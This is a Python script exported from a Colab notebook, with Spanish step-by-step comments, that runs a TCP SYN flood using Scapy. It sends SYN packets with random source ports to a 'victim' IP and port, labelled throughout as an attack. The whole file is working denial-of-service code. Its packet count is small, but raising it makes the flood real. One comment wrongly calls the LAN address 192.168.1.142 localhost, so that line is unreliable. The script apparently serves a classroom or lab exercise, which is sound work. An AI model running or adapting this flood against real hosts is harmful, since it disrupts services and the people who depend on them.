# -*- coding: utf-8 -*-
"""syn_flood.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/14Vpr7e-dHkTSJtnNCriKjFethiXWlruC
"""



from scapy.all import *

# Ponemos "192.168.1.142" (localhost / nuestra propia máquina) para pruebas seguras
victima_ip = "192.168.1.142"

puerto_victima = 8888

num_paquetes = 10

# INICIO DEL ATAQUE

print("=" * 50)
print("SYN FLOOD ATTACK")
print("=" * 50)
print(f"IP Víctima: {victima_ip}")
print(f"Puerto Víctima: {puerto_victima}")
print(f"Número de paquetes: {num_paquetes}")
print("=" * 50)
print("Presiona Ctrl+C para detener antes de tiempo")
print("")

contador = 0

try:
    for i in range(num_paquetes):

        # PASO 1: Crear la capa IP
        # src = dirección IP de origen (la dejamos por defecto, Scapy pone la nuestra)
        capa_ip = IP(dst=victima_ip)

        # PASO 2: Crear la capa TCP
        # sport = puerto origen (aleatorio)
        # dport = puerto destino (el de la víctima, el que atacamos)
        # flags = "S" significa SYN (el primer paso del handshake TCP)
        puerto_origen = RandShort()  # RandShort() genera un número entre 1 y 65535
        capa_tcp = TCP(sport=puerto_origen, dport=puerto_victima, flags="S")

        # PASO 3: Juntar las capas para formar el paquete
        paquete = capa_ip / capa_tcp

        # PASO 4: Enviar el paquete
        send(paquete, verbose=False) # verbose=False para que no imprima "Sent 1 packets" cada vez

        contador = contador + 1

        print(f"Paquete SYN #{contador} enviado desde puerto {puerto_origen} -> {victima_ip}:{puerto_victima}")

    # FIN DEL ATAQUE (si no se interrumpe antes)
    print("")
    print("=" * 50)
    print(f"ATAQUE COMPLETADO. Se enviaron {contador} paquetes SYN.")
    print("=" * 50)

# Capturar Ctrl+C para detener el ataque manualmente
except KeyboardInterrupt:
    print("")
    print("=" * 50)
    print(f"ATAQUE DETENIDO. Se enviaron {contador} paquetes SYN.")
    print("=" * 50)